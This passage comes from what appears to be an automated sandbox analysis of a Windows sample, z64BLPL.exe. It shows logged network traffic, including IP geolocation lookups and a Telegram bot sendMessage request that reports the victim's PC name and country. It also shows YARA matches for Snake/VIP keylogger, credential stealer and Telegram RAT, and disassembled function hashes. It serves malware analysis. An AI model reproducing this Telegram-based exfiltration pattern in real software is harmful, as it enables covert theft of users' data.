2024-09-26 15:10:44 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	188.114.97.3	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:45 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 15:10:45 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:10:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 28277 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BZvFjdo%2Fb0n5tYkkUQF53i3XcrfLl250UYyhDRuqW6oN6y8M3KbYtdWPjvMd7RU3hLBgg6qHCbZyTsqEDcf4kZ95vir3P4yRhQbqRpz9ZqKTlnA66tCbRhTGkgYTEl81tnemHuB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c942ebf3a3c41ed-EWR
2024-09-26 15:10:45 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 15:10:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	149.154.167.220	443	7268	C:\Users\user\Desktop\z64BLPL.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:10:46 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-26 15:10:46 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 26 Sep 2024 15:10:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-26 15:10:46 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	11:09:57
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\z64BLPL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\z64BLPL.exe"
Imagebase:	0x690000
File size:	276'992 bytes
MD5 hash:	9C7CF85D2FA1D9C0B6C591B94CBF2830
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	14.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.1%
Total number of Nodes:	112
Total number of Limit Nodes:	9

Executed Functions

Function 00D3C146 Relevance: 6.5, Strings: 5, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00D3C3EF
LjAp, xrefs: 00D3C38D
LjAp, xrefs: 00D3C377
PH^q, xrefs: 00D3C400
0oAp, xrefs: 00D3C20A

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 18427c7a7102b0e29377e54f3d55fe402c4ceb35e4a11a017d64498c028d5b32
Instruction ID: 7e8ced54b661f7b7cf5507bfaf206d002e256605d569aff7a5dc12caba9dc833
Opcode Fuzzy Hash: 18427c7a7102b0e29377e54f3d55fe402c4ceb35e4a11a017d64498c028d5b32
Instruction Fuzzy Hash: E8A1C575E10218DFDB14DFAAD884A9DBBF2BF89310F14D069E409AB365DB31A941CF60

Function 00D35362 Relevance: 6.4, Strings: 5, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00D355D9
LjAp, xrefs: 00D35550
0oAp, xrefs: 00D353E2
LjAp, xrefs: 00D35566
PH^q, xrefs: 00D355C8

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: eccaa6937c6ad52a411e48855d6588b02e6d0fe10630bf31322ff6ded8bff7a7
Instruction ID: 4e44ad08c64ec5fe02575ae2dc4d2421793c9f1a73caeec1bc7f83381508260d
Opcode Fuzzy Hash: eccaa6937c6ad52a411e48855d6588b02e6d0fe10630bf31322ff6ded8bff7a7
Instruction Fuzzy Hash: 7491D474E01618CFDB14DFAAD984A9DBBF2BF89300F14C069E409AB365DB349985CF60

Function 00D3CD28 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 00D3CF1D
PH^q, xrefs: 00D3CF7F
PH^q, xrefs: 00D3CF90
0oAp, xrefs: 00D3CD9A
LjAp, xrefs: 00D3CF07

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: fc7ccd19deefad01ce9d027f0ff6f11f7e7db31239b31f6fc300def9b633f943
Instruction ID: 82b2389870016d1ab6f5f0296aa6201d321ffa1a8c8f94ffdbb8d893dad49729
Opcode Fuzzy Hash: fc7ccd19deefad01ce9d027f0ff6f11f7e7db31239b31f6fc300def9b633f943
Instruction Fuzzy Hash: 5B81A274E11218DFDB14DFAAD984A9DBBF2BF88300F14D069E419AB365DB349981CF60

Function 00D3CFF7 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 00D3D06A
LjAp, xrefs: 00D3D1ED
PH^q, xrefs: 00D3D260
PH^q, xrefs: 00D3D24F
LjAp, xrefs: 00D3D1D7

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 94cdf78fee84e917352cb509439eb6fd186958eae924fde7587deffc84b57828
Instruction ID: 4709d0bbc26e7e478b208d0cf20f4a4df47d9230f6d042b532f070bc27bb9173
Opcode Fuzzy Hash: 94cdf78fee84e917352cb509439eb6fd186958eae924fde7587deffc84b57828
Instruction Fuzzy Hash: D4818474E00258DFDB14DFAAD984A9DBBF2BF88300F14C069E419AB365DB349985CF64

Function 00D3C468 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 00D3C65D
PH^q, xrefs: 00D3C6D0
LjAp, xrefs: 00D3C647
0oAp, xrefs: 00D3C4DA
PH^q, xrefs: 00D3C6BF

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a3a7a84cf24e26f177836fed320af593302a7ce96da0d125d7bfed66a0f676c7
Instruction ID: d36adf49b97e874510946a870ca5a01982918a98c0c16e9e535525449bc1d5c4
Opcode Fuzzy Hash: a3a7a84cf24e26f177836fed320af593302a7ce96da0d125d7bfed66a0f676c7
Instruction Fuzzy Hash: E781B274E10258CFDB14DFAAD984A9DBBF2BF88300F24D069E419AB365DB349981CF50

Function 00D3D599 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 00D3D78D
0oAp, xrefs: 00D3D60A
LjAp, xrefs: 00D3D777
PH^q, xrefs: 00D3D800
PH^q, xrefs: 00D3D7EF

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: d2e1cadf140471f5327d81058e8aaf3e0e7aa67bbfdc0976a14af73aeed65449
Instruction ID: 9cb8d78e1aa22c9f154efc9bd4aa31acc02b1b8c6158ae36224663a0b05a8b22
Opcode Fuzzy Hash: d2e1cadf140471f5327d81058e8aaf3e0e7aa67bbfdc0976a14af73aeed65449
Instruction Fuzzy Hash: 55819374E01218CFDB14DFAAD984A9DBBF2BF88300F24D469E419AB365DB349945CF60

Function 00D3D2CB Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00D3D530
0oAp, xrefs: 00D3D33A
PH^q, xrefs: 00D3D51F
LjAp, xrefs: 00D3D4BD
LjAp, xrefs: 00D3D4A7

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 995a3689825a3a5d3bd4ead5cae383805a6b676173c5a47b3eaa390766a03a48
Instruction ID: 9c8fb041c127aceb23831d531124b7a2857f18ff12ca0c58d278e92847d754bb
Opcode Fuzzy Hash: 995a3689825a3a5d3bd4ead5cae383805a6b676173c5a47b3eaa390766a03a48
Instruction Fuzzy Hash: 92819374E00218DFDB14DFAAE984A9DBBF2BF88300F14C069E419AB365DB349981CF50

Function 00D3C738 Relevance: 6.4, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 00D3C92D
PH^q, xrefs: 00D3C9A0
LjAp, xrefs: 00D3C917
0oAp, xrefs: 00D3C7AA
PH^q, xrefs: 00D3C98F

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: d5bcf4fb531a4a10262b6895a43329e18053594dd84c55b7ea2b14470845cc64
Instruction ID: cd08e5884eb48b0d560d6a84d4c06702d87c14a7d1713341527d277614ea0872
Opcode Fuzzy Hash: d5bcf4fb531a4a10262b6895a43329e18053594dd84c55b7ea2b14470845cc64
Instruction Fuzzy Hash: 34819174E002189FDB14DFAAD984B9DBBF2BF88300F24D069E459AB365DB349941CF60

Function 00D329EC Relevance: 5.5, Strings: 4, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 00D32AD8
Xbq, xrefs: 00D32B57
Xbq, xrefs: 00D32A9E
Xbq, xrefs: 00D32BA4

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 32109cf8d7ffcb1be80a5de5bcf472cf03007854e7de93cdd5502a554f4e85e4
Instruction ID: e512ac644d488669f199ef33554952a9a475a7668e8640b626f4119474b1c312
Opcode Fuzzy Hash: 32109cf8d7ffcb1be80a5de5bcf472cf03007854e7de93cdd5502a554f4e85e4
Instruction Fuzzy Hash: 8BF1A63194A394CFDF524B7484A829BBF71EF47310F4A4CEAC846975A6CA384949CF71

Function 00D37118 Relevance: 5.3, Strings: 4, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 00D37212
,bq, xrefs: 00D37298
,bq, xrefs: 00D3728A
(o^q, xrefs: 00D37220

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 99028e716c96d33bb8ec9c9a17883f5c50c6595f5b356f473d8766035bde7fa2
Instruction ID: 1a6facd7078cd31cd3cbc928dac1f2a7bdab5bdc85c9cb48ee359da783cd4094
Opcode Fuzzy Hash: 99028e716c96d33bb8ec9c9a17883f5c50c6595f5b356f473d8766035bde7fa2
Instruction Fuzzy Hash: 7FE130B1A04619DFCB25CF69D884AADBBF2BF48301F298065E855EB365D730EC41DB60

Function 066951A8 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON

Download Yara Rule

Strings

N, xrefs: 06698588

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 404ff21865e1d4a3b7a9af1de3e4befb12c55d870fe191cdaee918279f0820d9
Instruction ID: 1cccbe9bfa188391401b6dda487eeeb93a526645c0355a2c40dca53645c2d699
Opcode Fuzzy Hash: 404ff21865e1d4a3b7a9af1de3e4befb12c55d870fe191cdaee918279f0820d9
Instruction Fuzzy Hash: 4E73E731D1075A8EDB11EF68C854A99FBB1FF99300F11D69AE44977221EB70AAC4CF81

Function 06699DF0 Relevance: 3.5, Strings: 1, Instructions: 2230COMMON

Download Yara Rule

Strings

K, xrefs: 0669C46B

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: bedb5e4342ca6256479e4decccbcc4850a861db9dd7b5f3b155a91643c05fdaf
Instruction ID: adafcaecf3c934c7375b959ea37854e44151389febfc80d199d0a9489e7fec0e
Opcode Fuzzy Hash: bedb5e4342ca6256479e4decccbcc4850a861db9dd7b5f3b155a91643c05fdaf
Instruction Fuzzy Hash: AA33E530C146198EDB51EFA8C854A9DFBB5FF99300F10D69AE45877221EB70AAC4CF91

Function 00D3A088 Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

(o^q, xrefs: 00D3A518
4'^q, xrefs: 00D3AB13

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: ecfd6a18ff43a91bc90b0d2e33a750a535b7a0ed0aea62f97efbec711c65a604
Instruction ID: b625c3b44fb5f27bb6748014020e2bfaf322392039bf4aec22c6fe28a081e063
Opcode Fuzzy Hash: ecfd6a18ff43a91bc90b0d2e33a750a535b7a0ed0aea62f97efbec711c65a604
Instruction Fuzzy Hash: C5823B71B00209DFCB15CFACC984AAEBBF2BF48314F15855AE8859B265D731ED41CB62

Function 00D369A0 Relevance: 3.0, Strings: 2, Instructions: 510COMMON

Download Yara Rule

Strings

Hbq, xrefs: 00D36DA6
(o^q, xrefs: 00D36EDA

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: f3698c0f822bb6f43f019cf1f1087943162be55131a7a0483dc5e131e16f5729
Instruction ID: edf5313ac24d38c95c625b2d96657a8225419afdde0a51e096b0ab66fa89a4cd
Opcode Fuzzy Hash: f3698c0f822bb6f43f019cf1f1087943162be55131a7a0483dc5e131e16f5729
Instruction Fuzzy Hash: 94125B71A002199FCB14DF69D854AAEBBF6BF88300F24C569E945EB391DB30DD45CBA0

Function 066996C8 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca39c6d044028b939f9e2f6e7b437c0249c449292876c880391a111b9ab9ec1
Instruction ID: c1a01b90db7120bd1054bcced6105a29ab9a3c2c0f82a728df69ec8648b432f2
Opcode Fuzzy Hash: 0ca39c6d044028b939f9e2f6e7b437c0249c449292876c880391a111b9ab9ec1
Instruction Fuzzy Hash: C3F1F674D01218CFDB54DFA9D884B9DBBB6BF88304F14C2A9E808AB355DB349985CF60

Function 06699D89 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

K, xrefs: 0669C46B

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 57e0d220e3d0f7d31993ac4e26a7f4d6523e7f6499eaf3dda07c2de04ef73695
Instruction ID: c8d9997b7f53de19af5e89c31d4c7ead3a014b5b0135ac3b7a29f3de4405fb0f
Opcode Fuzzy Hash: 57e0d220e3d0f7d31993ac4e26a7f4d6523e7f6499eaf3dda07c2de04ef73695
Instruction Fuzzy Hash: A4C14770D056188FDB51DFA9C88479DFBB1FF89300F14D29AE408AB261EB74AA85CF50

Function 06690B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fba4ab74e9a81268d7c8a47fe1f63a62c8b673a2e88599025154cfd7380f1c7
Instruction ID: db1ba2a788be1d24cc0638f4c3d8c9891c8326b3a22712e323e4e920a04901af
Opcode Fuzzy Hash: 3fba4ab74e9a81268d7c8a47fe1f63a62c8b673a2e88599025154cfd7380f1c7
Instruction Fuzzy Hash: 8072CF74E012298FDB64DF69C984BDDBBB6BB49300F2491E9D808A7355DB349E82CF50

Function 06692970 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7c7a127e1ba9937100ce1eb64327714cebc9415f292434809c9ec44ae46666a
Instruction ID: 03408c8e215867303978195cc5f37eb42fc34c92fbaeb4e885aa6b2532569561
Opcode Fuzzy Hash: b7c7a127e1ba9937100ce1eb64327714cebc9415f292434809c9ec44ae46666a
Instruction Fuzzy Hash: 8DC1B278E01218DFDB54DFA5D994B9DBBB6FF88300F2081A9D809A7364DB359A85CF10

Function 06692288 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a36741f1e0e73f415116e81e4a664182086b65a1bb853c80abfef12bf7de1bf
Instruction ID: 6f8f030b6cae16b34093ce2e7bb6c845895c8884a74646d2e777f342f3696c5c
Opcode Fuzzy Hash: 2a36741f1e0e73f415116e81e4a664182086b65a1bb853c80abfef12bf7de1bf
Instruction Fuzzy Hash: 7BA1B470E012189FEB68CF6AD954B9DFBF6BF88300F14C0A9D408A7254DB345A85CF51

Function 06692F48 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5e5489841977402f2b98da8300c4d1c9809e0f75d5a83c342df11ad1b998bc
Instruction ID: f47ef9ff8f50a8f3d279dcc3f0d309ccf7334840c449a1087b6b4cd7deb723ae
Opcode Fuzzy Hash: 8c5e5489841977402f2b98da8300c4d1c9809e0f75d5a83c342df11ad1b998bc
Instruction Fuzzy Hash: B0A1E270D002088FDB14DFA9D988B9DBBB1FF89314F209269E409B73A1DB749985CF65

Function 06692F37 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e67be255bd912f818c746890cff3ec0c99d781d8a3bb98243952a98712fbe8
Instruction ID: 6c4ced1ea2b417f8eada9845d6caa37d55df90f792726c1e76a046467bbc1ddd
Opcode Fuzzy Hash: 84e67be255bd912f818c746890cff3ec0c99d781d8a3bb98243952a98712fbe8
Instruction Fuzzy Hash: F6A10374D002088FDB14DFA9D984BDDBBB1FF89304F209269E408AB3A1DB749985CF65

Function 06691BA8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c53f2f3288929f1cadf3bc7f2552752dfbcc6d352d30fb5560f7498d9c35bd
Instruction ID: 3679cc8b2e66e2b7f03c78426b2961f0b58154c40db515b0757fb7715af2c6f1
Opcode Fuzzy Hash: 23c53f2f3288929f1cadf3bc7f2552752dfbcc6d352d30fb5560f7498d9c35bd
Instruction Fuzzy Hash: A2A1A375E012198FEB68CF6AD944B9DFBF2BF89300F14C1AAD808A7254DB345A85CF51

Function 00D3FC37 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4120408756.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_z64BLPL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91de9052f1d5e8639c262e033f6c94b259557cd285444d14e0349c26e163541c
Instruction ID: 00571d56c88fa5cff80e1f64915143e9276dd412d5043978fbd802f05d0e1fd8
Opcode Fuzzy Hash: 91de9052f1d5e8639c262e033f6c94b259557cd285444d14e0349c26e163541c
Instruction Fuzzy Hash: 5C91B374E00218DFDB14DFA9D990A9EBBB2FF88300F248129E814BB358DB759946CF54

Function 0669328E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4125146459.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_z64BLPL.jbxd

